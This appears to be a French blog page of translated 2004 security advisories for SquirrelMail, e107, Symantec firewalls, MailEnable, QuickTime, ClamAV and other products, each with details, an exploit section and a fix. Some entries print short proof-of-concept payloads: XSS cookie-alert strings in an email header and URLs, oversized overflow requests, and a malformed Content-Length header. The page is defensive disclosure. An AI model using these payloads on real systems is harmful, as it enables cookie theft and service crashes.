Advisories de sécurité

Sujet: SquirrelMail Email Header HTML Injection Vulnerability
Versions: SquirrelMail SquirrelMail 1.4.* & 1.5 except 1.4.3
Auteur: Roman Medina [roman@rs-labs.com].
Traducteur FR: Z4rK
Date: 3 juin 2004



--------------------------------------------------------------------------------


1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |



--------------------------------------------------------------------------------


| Détails |

SquirrelMail est enclin a une vulnérabilité permettant l'injection d'un code HTML arbitraire au niveau de l'en-tête des emails. Cette vulnérabilité est due à un mauvais filtrage au niveau des possibilités d'écriture de celle-ci, permettant ainsi l'insertion du code malveillant.

Un attaquant peut exploiter cette vulnérabilité pour accéder aux
cookies de l'utilisateur ciblé ; la révélation de l'email personnel est possible. D'autres attaques sont également possibles.



--------------------------------------------------------------------------------


| Exploit |

Aucune exploit n'est exigée pour exploiter cette vulnérabilité. On rapporteque l'exploitation réussie dépend du serveur d'IMAP utilisé pouranalyser l'email offensant. La preuve suivante de la valeur de concept du 'Contenu-Type 'a été fournie :

Content-Type: application/octet-stream"window.alert(document.cookie"; name=top_secret.pdf



--------------------------------------------------------------------------------


| Solution |

L'upgrade du soft est disponible a l'adresse suivante:

http://www.squirrelmail.org/download.php

Sujet: SquirrelMail Folder Name Cross-Site Scripting Vulnerability
Versions: http://www.securityfocus.com/bid/10246
Auteur: Alvin Alex
Traducteur FR: le_rasta
Date: Parution le 30 Avril 2004



--------------------------------------------------------------------------------


1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |



--------------------------------------------------------------------------------


| Détails |

SquirrelMail possède une faille CSS (cross site scripting) qui peut-être utilisée en manipulant la variable d'affichage du nom de répertoire ( généralement $mailbox ).
Ce problème vient du fait que l'application ne filtre pas proprement le champs utilisé avant de l'inclure dans une page dynamique.

On peut notamment l'utiliser pour le vol de cookie, mais d'autres attaques peuvent être realisées.



--------------------------------------------------------------------------------


| Exploit |

Ce n'est pas un exploit proprement dit, mais voila un petit exemple d'url faillible:
http://www.example.com/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script>




--------------------------------------------------------------------------------


| Solution |

Mettre à jour SquirrelMail:
SquirrelMail Upgrade SquirrelMail 1.4.3-RC1
http://sourceforge.net/project/showfiles.php?group_id=311&package_id=334&release_id=237332

Sujet: UCD-SNMPD Command Line Parsing Local Buffer Overflow Vulnerability
Versions: UCD-SNMP UCD-SNMP 4.2.6
Auteur: priest priest
Traducteur FR: le_rasta
Date: Parution le 21 Mai 2004



--------------------------------------------------------------------------------


1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |



--------------------------------------------------------------------------------


| Détails |

Le serveur SNMPd UCD-SNMP possède une faille de type buffer overflow due à un mauvais filtrage des paramètres dans les lignes de commandes.
Ceci vient du fait que l'application ne définit pas clairement la taille des arguments que donnent les utilisateurs avant de les copier dans la mémoire tampon.
Ce problème permet à une personne hostile d'influencer le bon fonctionnement du serveur SNMPd et donc de finallement pouvoir éxécuter un code arbitraire avec les droits du serveur.




--------------------------------------------------------------------------------


| Exploit |

Pas d'exploit disponible pour le moment.



--------------------------------------------------------------------------------


| Solution |

Pas de solution disponible pour le moment.

Sujet: e107 Website System Log.PHP HTML Injection Vulnerability
Versions: e107 website system 0.545, 0.554, 0.555 Beta, 0.603, 0.6 10, 0.6 11, 0.6 12, 0.6 13, 0.6 14, 0.6 15, 0.6 15a
Auteur: Chinchilla
Traducteur FR: le_rasta
Date: Parution le 21 Mai 2004



--------------------------------------------------------------------------------


1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |



--------------------------------------------------------------------------------


| Détails |

e107 website system est sujet d'une faille de type injection de HTML.
Ce problème est dû à l'incapacité de l'application de bien filtrer les données des champs que l'utilisateur utilise.



--------------------------------------------------------------------------------


| Exploit |

Il est possible d'injecter du code hostile de type HTML, ou autres langages interprétés tels que JavaScript, VBScript etc .. en mettant ce code en parametre dans l'url au niveau de la page log.php

L'application emmagasine le code injecté, qui peut-être interprété dans le navigateur d'un utilisateur qui ne se doute de rien en allant sur la page de log infectée.

Ce n'est pas vraiment un exploit, mais une url de ce genre suffit:

http://www.example.com/e107_plugins/log/log.php?referer=code
goes&color=24&eself=http://www.example.com/stats.php&res=1341X1341




--------------------------------------------------------------------------------


| Solution |

Pour l'instant aucune solution n'est disponible

# posted by Laurent Bourrelly @ 10:31 AM

Sujet: HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions
Versions: HP-UX 11.x
Auteur: HP
Traducteur FR: ThickParasite
Date: 14 mai 2004



--------------------------------------------------------------------------------


1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |



--------------------------------------------------------------------------------


| Détails |

HP a rapporté une vulnérabilité dans HP-UX, qui peut être exploité par des personnes mal intentionnées, pour manipuler le contenu de certains fichiers en local.

La vulnérabilité est due aux permissions non sécurisées d'un répertoire sur les systèmes utilisant B6848AB GTK+ Support Librairies. Le problème concerne les fichiers source qui sont modifiables par n'importe quel utilisateur.

Une exploitation réussie peut permettre l'exécution de code arbitraire avec des privilèges si les nouvelles bibliothèques sont programmées depuis les sources corrompues.

La vulnérabilité concerne HP-UX B.11.00 et B.11.11 si les Support Libraries B6848AB GTK+ sont installées.



--------------------------------------------------------------------------------


| Exploit |

Aucun exploit connu à ce jour.



--------------------------------------------------------------------------------


| Solution |

Réinstaller B6848AB et définir des permissions d'accès correctes.

Installer la révisison B6848AB 1.4gm. 46

Sujet: HP-UX B6848AB GTK+ Support Libraries Insecure Directory Permissions
Versions: HP-UX 11.x
Auteur: HP
Traducteur FR: ThickParasite
Date: 14 mai 2004


--------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |


--------------------------------------------------------------------------------

| Détails |

HP a rapporté une vulnérabilité dans HP-UX, qui peut être exploité par des personnes mal intentionnées, pour manipuler le contenu de certains fichiers en local.

La vulnérabilité est due aux permissions non sécurisées d'un répertoire sur les systèmes utilisant B6848AB GTK+ Support Librairies. Le problème concerne les fichiers source qui sont modifiables par n'importe quel utilisateur.

Une exploitation réussie peut permettre l'exécution de code arbitraire avec des privilèges si les nouvelles bibliothèques sont programmées depuis les sources corrompues.

La vulnérabilité concerne HP-UX B.11.00 et B.11.11 si les Support Libraries B6848AB GTK+ sont installées.


--------------------------------------------------------------------------------

| Exploit |

Aucun exploit connu à ce jour.


--------------------------------------------------------------------------------

| Solution |

Réinstaller B6848AB et définir des permissions d'accès correctes.

Installer la révisison B6848AB 1.4gm. 46


--------------------------------------------------------------------------------

| Copyrights |

Auteur: HP
Traducteur FR: ThickParasite
Référence: http://secunia.com/advisories/11615/

Sujet: Sun Solaris SMC Web Server File Enumeration Security Issue
Versions: Sun Solaris 8 Sun Solaris 9
Auteur: Jon Hart
Traducteur FR: ThickParasite
Date: 14 mai 2004


--------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |


--------------------------------------------------------------------------------

| Détails |

Il a été rapporté une faille de sécurité dans Sun Solaris, qui peut être exploité par des personnes mal intentionnées pour énumérer des fichiers sur un système infecté.

La faille concerne le serveur Web SMC (SUN MANAGEMENT CONSOLE) qui retourne différents messages d'erreurs selon que le fichier existe en dehors du DocumentBase ou non. Cela peut être exploité via une attaque transversale classique.

Cette faille concerne Sun Solaris 8 et 9 sur les plateformes SPARC et x86.


--------------------------------------------------------------------------------

| Exploit |

Aucun exploit connu à ce jour.


--------------------------------------------------------------------------------

| Solution |

Cette faille de sécurité a été réparée pour Solaris 9 grâce aux patchs :

SPARC
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116807&rev=01

x86
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116808&rev=01


--------------------------------------------------------------------------------

| Copyrights |

Auteur: Jon Hart
Traducteur FR: ThickParasite
Référence: http://secunia.com/advisories/11616/

Sujet: Ethereal Multiple Vulnerabilities
Versions: Ethereal 0.x
Auteur: Ethereal
Traducteur FR: ThickParasite
Date: 14 mai 2004


--------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |


--------------------------------------------------------------------------------

| Détails |

Description :
*************
De multiples vulnérabilités ont été découvertes dans Ethereal. Elles peuvent être exploitées par des personnes mal intentionées pour causer un DoS (Denial-of-Service).

1) Une erreur au sein de la gestion des paquets SIP peut, sous certaines conditions, crasher l'application. Cette vulnérabilité affecte la version 0.10.3.

2) Une erreur au sein du protocole AIM peut être exploitée pour crasher l'application. Cette vulnérabilité affecte la version 0.10.3.

3) Une erreur du NULL au sein du protocole SPNEGO peut être exploitée pour crasher l'application. Cette vulnérabilité affecte les versions 0.9.8. à 0.10.3.

4) Une erreur "boundary" au sein du protocole MMSE peut être exploitée pour causer un buffer overflow. Cette attaque peut permettre d'exécuter du code arbitraire sur un systême vulnérable.

Cette vulnérabilité affecte les versions 0.10.1. à 0.10.3.



--------------------------------------------------------------------------------

| Exploit |

Aucun exploit connu à ce jour.


--------------------------------------------------------------------------------

| Solution |

Mise à jour vers la version 0.10.4.


--------------------------------------------------------------------------------

| Copyrights |

Auteur: Ethereal
Traducteur FR: ThickParasite
Référence: http://secunia.com/advisories/11608/

Sujet: Symantec Client Firewall Products Multiple Vulnerabilities
Versions: Symantec Norton Internet Security et Pro 2002, 2003, 2004; Symantec Norton Personal Firewall 2002, 2003, 2004; Symantec Norton AntiSpam 2004; Symantec Client Firewall 5.01, 5.1.1; Symantec Client Security 1.0, 1.1, 2.0
Auteur: Barnaby Jack, Karl Lynn et Derek Soeder, eEye Digital Security
Traducteur FR: le_rasta
Date: parution le 12 Mai 2004


--------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |


--------------------------------------------------------------------------------

| Détails |

eEye Digital Security ont découvert de multiples vulnérabilités dans différents firewalls des produits Symantec.
Ces trous de securité peuvent être exploités pour causer un Deni de Service ou compromettre le système cible.



--------------------------------------------------------------------------------

| Exploit |

1/ Une erreur de limite est présente dans le pilote "SYMDNS.SYS" pendant le traitement des datagrammes NBNS (NetBIOS Name Service) et peut être exploitée pour provoquer
un buffer overflow sur la pile en envoyant une réponse NBNS particulièrement modifiée à un système vulnérable.

Si l'exploitation fonctionne, cela permet l'éxécution de code arbitraire avec les droits 0 du kernel, mais exige qu'il y ait le traffic NBNS (port 137/udp) d'autorisé (ce qui n'est pas le cas par défaut).

2/ Une seconde erreur dans le pilote "SYSDNS.SYS" pendant le traitement des datagrammes DNS (Domain Name Service) qui peut être exploitée pour stopper le système en envoyant simplement une réponse DNS particulièrement modifiée au système vulnérable.

3/ Troisieme erreur dans le pilote "SYSDNS.SYS" pendant le traitement des datagrammes NBNS qui peut être exploitée pour corrompre la mémoire en envoyant une réponse NBNS particulièrement modifiée au système vulnérable.

Si l'exploitation a réussi, normalement cela permet l'éxécution de codes arbitraires avec les droits 0 du kernel, mais exige que le traffic NBNS (port 137/udp) soit autorisé.

4/ Une autre erreur de limite est présente dans le pilote "SYSDNS.SYS" pendant le traitement des datagrammes DNS peut être exploitée pour provoquer un buffer overflow sur la pile à cause d'une réponse DNS particulièrement modifiée contenant un nom canonique excessivement long dans le champs d'enregistrement CNAME.

L'exploitation réussie permettrait l'éxécution de codes arbitraires avec les droits 0 du kernel.
Cela peut normalement être exploité correctement avec tous les ports filtrés, et toutes les règles d'intrusions activées et ceci est dû a une faille du système.

NOTE: La vulnérabilité a été jugée très critique car la dernière faille peut être potentiellement un ver.
La faille est très similaire à la faille de "ICQ Response Buffer Overflow" qui est présente dans certains produits ISS, qui ont déjà été exploités par le ver 'WITTY' le jour suivant la mise au grand public de la vulnerabilité.



--------------------------------------------------------------------------------

| Solution |

Télécharger les patchs disponnibles par le soft LiveUpdate ou aller sur les supports techniques.



--------------------------------------------------------------------------------

| Copyrights |

Auteur: Barnaby Jack, Karl Lynn et Derek Soeder, eEye Digital Security
Traducteur FR: le_rasta
Référence: http://secunia.com/advisories/11066/

Sujet: Multiple LHA Buffer Overflow/Directory Traversal Vulnerabilities
Versions: Mr. S.K. LHA 1.14 Mr. S.K. LHA 1.15 Mr. S.K. LHA 1.17 RARLAB WinRar 3.20 RedHat lha-1.14i-9.i386.rpm + RedHat Linux 9.0 i386 Stalker CGPMcAfee 3.2 + McAfee Antivirus Engine 4.3.20 WinZip WinZip 9.0
Auteur: Ulf Harnhammar
Traducteur FR: ThicParasite
Date: 09 mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

LHA est sensible à de multiples vulérabilités qui peuvent permettre à une archive corrompue d'exécuter du code arbitraire ou de corrompre des fichies arbitraires quand cette archive est utilisée.

Les premières failles sont assignées à CVE candidate identifier (CAN-2004-0234). Il a été rapporté que LHA contient 2 vulanabilités de type buffer overflow au niveau de la pile. Ces vulérabilités peuvent être exploitées pour envoyer des instructions avec les privilèges de l'utilisateur qui invoque l'utilitaire LHA infecté.
Le second volet concernet CVE candidate identifier (CAN-2004-0235). En plus des vulnérabilités de type buffer overflow, LHA est sujet à de sévères failles de répértoire transversaux. Ces répértoires transervaux contiennent des failles qui permettent d'exploiter ou de corrompre des fichiers lors de l'utilisation de l'utiliaire.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Auncun exploit connu à ce jour.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Il a été rapporté que d'utiliser CGPMafee plug-in with d-option peut contourner cette faille.
Les utilisateurs des différents systmès doivent contacter leus revendeurs pour plus de détails.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Ulf Harnhammar
Traducteur FR: ThicParasite
Référence: http://www.securityfocus.com/bid/10243/solution/

Sujet: Microsoft Outlook External Reference Vulnerability
Versions: MS Office 2003 toutes éditions et MS Outlook 2003
Auteur: http-equiv
Traducteur FR: ThickParasite
Date: 12 mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Il a été rapporté qu'une faille de sécurité dans MS Outlook, permettrait à des personnes mal intentionnées de vérifier si le destinataire d'un email a bien lu le message.
Outlook 2003 est supposé protéger contre le chargement d'objects depuis des sources externes lors de la consultation d'emails. Cependant, il est possible de forcer Outlook à charger des objects XML depuis des serveurs externes. Cela peut-être exploité pour vérifier la validité du destinataire, mais aussi permettre de charger du contenu, qui serait normalement filtré.
Cette faille affecterait Outlook 2003. Les autres versions peuvent aussi être sensibles à cette faille, mais elles ne promettent pas la sécurité que clame Outlook 2003.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit connu à ce jour

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Filtrer les emails au format HTML

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: http-equiv
Traducteur FR: ThickParasite
Référence: http://secunia.com/advisories/11595/

Sujet: Gentoo update for OpenOffice
Versions: non disponible.
Auteur:
Traducteur FR: le_rasta
Date: Parution le 11 Mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Openoffice.org charge des codes depuis la libraire Neon qui présente plusieurs vulnérabilités au niveau du format des chaines de caractères, ce qui autorise une éxécution de codes arbitraires à distance lors d'une connection à un serveur WebDAV incertain.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Si vous utilisez la publication par WebDAV et que vous vous connectez à un serveur WebDAV malveillant, ce serveur peut exploiter ces vulnérabilités pour éxécuter des codes arbitraires avec les droits de l'utilisateur qui utilise Openoffice.org.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Il n'y a pas encore de fichiers patch pour les vulnérabilités, mais il est conseillé pour tous les utlisateurs des paquetages de openoffice-bin et ximian-openoffice-bin qui utilisent les fonctions de publication de WebDAV à upgrader vers les nouvelles versions des paquetages sources.

Les utilisateurs d'openoffice avec l'architecture x86 doivent taper ceci :

# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.1-r1"
# emerge ">=app-office/openoffice-1.1.1-r1"

Les utilisateurs d'openoffice avec l'architecture SPARC doivent taper ceci :

# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.0-r3"
# emerge ">=app-office/openoffice-1.1.0-r3"

Les utilisateurs d'openoffice avec l'architecture PPC doivent taper ceci :

# emerge sync
# emerge -pv ">=app-office/openoffice-1.0.3-r1"
# emerge ">=app-office/openoffice-1.0.3-r1"

Les utilisateurs d'openoffice-ximian doivent taper ceci :

# emerge sync
# emerge -pv ">=app-office/openoffice-ximian-1.1.51-r1"
# emerge ">=app-office/openoffice-ximian-1.1.51-r1"

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur:
Traducteur FR: le_rasta
Référence: http://article.gmane.org/gmane.linux.gentoo.announce/332

Sujet: Gentoo update for ClamAV
Versions: net-mail/clamav version < 0.70
Auteur:
Traducteur FR: le_rasta
Date: Parution le 11 Mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Clam Antivirus est vulnérable si dans votre configuration (clamav.conf) vous utilisez le paramètre '%f' pour VirusEvent, ce qui autoriserait à l'attaquant de pouvoir éxécuter des commandes système arbitraires et ainsi bénéficier d'une ascension de privilèges.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

En envoyant un virus avec un nom malicieux cela peut en résulter à l'éxécution arbitraire de commandes système avec les droits dont est lancé l'antivirus.
Souvent clamav est associé à des serveurs mails pour scanner les emails, donc cette attaque peut-être menée à distance.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Vous ne devez pas utiliser le paramètre '%f' pour VirusEvent dans votre fichier de configuration clamav.conf et vous devez faire une mise à jour pour gentoo :

emerge sync
emerge -pv ">=net-mail/clamav-0.70"
emerge ">=net-mail/clamav-0.70"


-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur:
Traducteur FR: le_rasta
Référence: http://article.gmane.org/gmane.linux.gentoo.announce/331

Sujet: SCO OpenServer Insecure Default XHost Access Controls
Versions: OpenServer 5.0.5, 5.0.6, 5.0.7
Auteur: KF
Traducteur FR: le_rasta
Date: Parution le 07 Avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Sco a laissé un ancien problème de sécurité, qui peut-être exploité malicieusement, par des utilisateurs locaux qui pourrait ainsi beneficier d'une ascension de privilèges.
Le problème serait dû à une insécurité dans le contrôle des accès aux xhosts.


-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit à ce jour.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Installer les derniers paquetages et d'activer Xauthority.
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: KF
Traducteur FR: le_rasta
Référence: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt

Sujet: SCO OpenServer Insecure Default XHost Access Controls
Versions: OpenServer 5.0.5, 5.0.6, 5.0.7
Auteur: KF
Traducteur FR: le_rasta
Date: Parution le 07 Avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Sco a laissé un ancien problème de sécurité, qui peut-être exploité malicieusement, par des utilisateurs locaux qui pourrait ainsi beneficier d'une ascension de privilèges.
Le problème serait dû à une insécurité dans le contrôle des accès aux xhosts.


-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit à ce jour.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Installer les derniers paquetages et d'activer Xauthority.
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: KF
Traducteur FR: le_rasta
Référence: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt

Sujet: Icecast Basic Authorization Denial of Service Vulnerability
Versions: 2.0.0 pour Windows, mais d'autres versions peuvent être faillibles.
Auteur: ned
Traducteur FR: le_rasta
Date: parution le 12 Mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

ned a découvert une faille dans Icecast qui peut-être exploitée pour provoquer un Deni de service.
La faille est due à un éxédant de messages d'erreur dans l'interface web pendant le traitement des requêtes de 'Basic Authorization'.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

On peut l'exploiter pour crasher l'application en passant une longue chaine de caractères ( environ 3000 bytes ) dans l'entête "Authorization:".

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Filtrer l'accès au service ( qui écoute par défaut sur le port 8000/tcp ) avec un firewall ou dans un serveur proxy.


-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: ned
Traducteur FR: le_rasta
Référence: http://secunia.com/advisories/11578/

Sujet: Remote Heap overflow Vulnerability in MAilEnable
Versions: MailEnable Professional Edition v1.5 up to v1.7
Auteur: Behrang Fouladi (behrang@hat-squad.com) && Pejman Davarzani (pejman@hat-squad.com)
Traducteur FR: le_rasta
Date: 09 Mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

La version professionnelle de MailEnable possède un service mail supplémentaire appelé HTTPMail.
HTTPMail est un protocole mail basé sur WEBDAV ce qui nous permet d'accéder à nos emails à partir du serveur sans les télécharger (ce qui n'est pas le cas avec POP).
Ce service (MEHTTPS) écoute par défaut sur le port 8080/tcp.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Il suffit d'envoyer une requête HTTP avec plus de 4045 bytes de long sur le service MEHTTPS, ce qui provoquera un tas de buffer overflow pendant l'authentification (si activée) et il est possible pour un attaquant distant d'éxécuter un code dans le systeme, ou juste crasher le service.
Si l'authentification est désactivée il faut une requête HTTP de plus de 8500 bytes pour provoquer le buffer overflow.

Exemples:
1/ authentification activée : GET /<4032xA> HTTP/1.1
2/ authentification désactivée : <8501xA>

Résultat, les adresses EAX et ECX seront redéfinies.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

MailEnable a sorti un patch pour ce problème : http://mailenable.com/hotfix/

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Behrang Fouladi (behrang@hat-squad.com) && Pejman Davarzani (pejman@hat-squad.com)
Traducteur FR: le_rasta
Référence: http://www.hat-squad.com/en/000071.html

Sujet: Vulnerability in Help and Support Center Could Allow Remote Code Execution
Versions: liste des OS faillibles disponnible ici -> http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx
Auteur:
Traducteur FR: le_rasta
Date: 11 Mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Il est possible d'éxécuter un code arbitraire chez la victime grâce à une faille présente dans le centre d'aide et de support de Windows en utilisant le protocole HCP.
Cette faille vous donne le contrôle complet de la machine cible, seulement si la victime n'a pas assez fait preuve d'attention.


-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

une personne malintentionnée peut construire une URL HCP contenant un code malicieux et glisser celle-ci sous forme de lien dans un site, ou dans un email. Elle s'éxécutera que si la victime visite ce lien, ce qui fournira à l'attaquant le contrôle total de la machine.


-------------------------------------------------------------------------------------------------------------------------------

| Solution |

patchs disponnibles à cette adresse : http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx ou directement avec Windows Update.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur:
Traducteur FR: le_rasta
Référence: http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx

Sujet: eMule Web Interface Negative Content Length Denial of Service
Versions: eMule 0.42g, mais d'autres versions peuvent être faillibles
Auteur: Rafel Ivgi
Traducteur FR: le_rasta
Date: 11 Mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Une faille a été decouverte dans eMule, qui peut-être exploitée par des personnes malintentionnées pour provoquer un Deni de service.
Plusieurs analyses indiquent que la vulnérabilité provient d'un éxédant de messages d'erreurs dans le panneau de contrôle Web lors du traitement de certaines requêtes HTTP POST.


-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

On peut l'utiliser pour crasher l'application, par exemple en envoyant une requête POST modifiée, contenant une valeur négative dans l'entête "Content-Length:".

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Filtrer les accès à l'interface Web, ou la désactivée ( en écoute par défaut sur le port 4711/tcp ).

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Rafel Ivgi
Traducteur FR: le_rasta
Référence: http://secunia.com/advisories/11589/

Sujet: Microsoft Internet Explorer Unconfirmed Memory Corruption Vulnerability
Versions: liste exaustive à cette adresse: http://www.securityfocus.com/bid/10299/info/
Auteur: E.Kellinis
Traducteur FR: Z4rK
Date: 10 mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

On a signalé que Internet Explorer peut être enclin à une vulnérabilité potentielle de corruption de mémoire qui pourrait permettre à un attaquant à distance de causer un "Denial Of Service" dans le browser. Un attaquant créant un site web malveillant qui utilise l'événement 'onLoad' et la fonction 'window.location' (Javascript), semblerait pouvoir accéder à un dossier arbitraire local.

Il convient de noter que la validité de cette vulnérabilité n'a put être confirmée par un manque de détails.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

La validité de cette vulnérabilité n'ayant été confirmée, aucun exploit n'est actuellement proposé.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

La validité de cette vulnérabilité n'ayant été confirmée, aucune solution n'est actuellement proposée.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: E.Kellinis
Traducteur FR: Z4rK
Référence: http://www.securityfocus.com/bid/10299

Sujet: Apple Mac OS X Server Administration Service Undisclosed Remote Buffer Overflow Vulnerability
Versions: Apple Mac OS X 10.2.8 et 10.3.3 Apple Mac OS X Server 10.0 à 10.3.3
Auteur: Jack C (
Traducteur FR: ThickParasite
Date: 8 mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Une vulnérabilité de type buffer overflow a été rapporté pour le service d'Apple Mac OS X Server Administration. Ce service est associé exclusivement au port 660.

Si le service gére une requête de plus de 2056 bytes de long, le systême va se crasher et rebooter.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit connu à ce jour.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Apple a publié un advisory APPLE-SA-2004-05-03 adressantla vulnérabilité.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Jack C (
Traducteur FR: ThickParasite
Référence: http://www.securityfocus.com/bid/9914/info/

Sujet: Apple QuickTime (QuickTime.qts) Heap Overflow Vulnerability
Versions: Apple QuickTime 6.5 Apple iTunes 4.2.0.72
Auteur: eEye
Traducteur FR: ThickParasite
Date: 8 mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Description :
*************
Le lecteur QuickTime d'Apple est utilisé pour jouer des fichiers audio et vidéo de manière interactive.

eEye Digital Security a découvert une faille de vulnérabilité dans QuickTime Player. La vulnérabilité permet à un agresseur distant d'écrire sur la heap memory et d'exécuter du code arbitraire dans le systême.
La faille est localisée dans le fichier QuickTime.qts qui permet l'accès aux fonctionalités de QuickTime pour de nombreuses applications. Un fichier video spécialement conçu pourra permettre cette attaque.

Détail techniques :
*******************
C'est le code du fichier QuickTime.qts qui copie des entrées de tables depuis le data "stsc" dans un espace de la memory heap.
Format:
Offset Type Description
------- ------- --------------------------------
0000h DWORD atom size
0004h DWORD atom type tag ('stsc')
0008h BYTE version
0009h BYTE[3] flags
000Ch DWORD number of entries
0010h ... sample-to-chunk table data

Le block, qui est censé retenir les data de la table, a une taille alouée égale au (nombre d'entrées + 2)*16
En indiquant une valeur de 0x0FFFFFFE ou plus grand, un dépassement d'intégration en résulte et une allocation insuffisante des blocks. Ce qui donne une re-écriture complète de la heap memory.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit disponible à ce jour.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Aucune solution connue à ce jour.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: eEye
Traducteur FR: ThickParasite
Référence: http://www.security-corporation.com/articles-20040503-002.html

Sujet: Coppermine Photo Gallery Multiple Input Validation Vulnerabilities
Versions: Liste exaustive à l'adresse suivante: http://www.securityfocus.com/bid/10253
Auteur: Janek Vind
Traducteur FR: Z4rK
Date: 5 mai 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

